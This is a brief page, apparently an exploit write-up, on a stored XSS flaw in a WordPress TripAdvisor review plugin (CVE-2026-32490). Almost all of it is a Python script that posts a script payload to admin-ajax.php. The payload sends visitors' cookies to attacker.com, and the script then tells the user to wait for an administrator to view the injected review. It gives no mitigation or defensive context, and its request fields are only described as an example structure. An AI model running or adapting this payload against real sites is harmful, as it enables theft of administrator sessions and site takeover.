CVE-2026-32490 WP TripAdvisor插件存储型XSS漏洞

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" admin_cookie = "wordpress_logged_in_xxx=..." # Malicious XSS payload xss_payload = "<script>alert('CVE-2026-32490');document.location='http://attacker.com/?c='+document.cookie;</script>" # Data to be submitted (example structure for a review slider) data = { "action": "save_review", "review_text": xss_payload, "rating": "5" } # Send the POST request headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": admin_cookie } response = requests.post(target_url, data=data, headers=headers) if response.status_code == 200: print("[+] Payload injected successfully.") print("[+] Wait for an admin to view the review page.") else: print("[-] Injection failed.")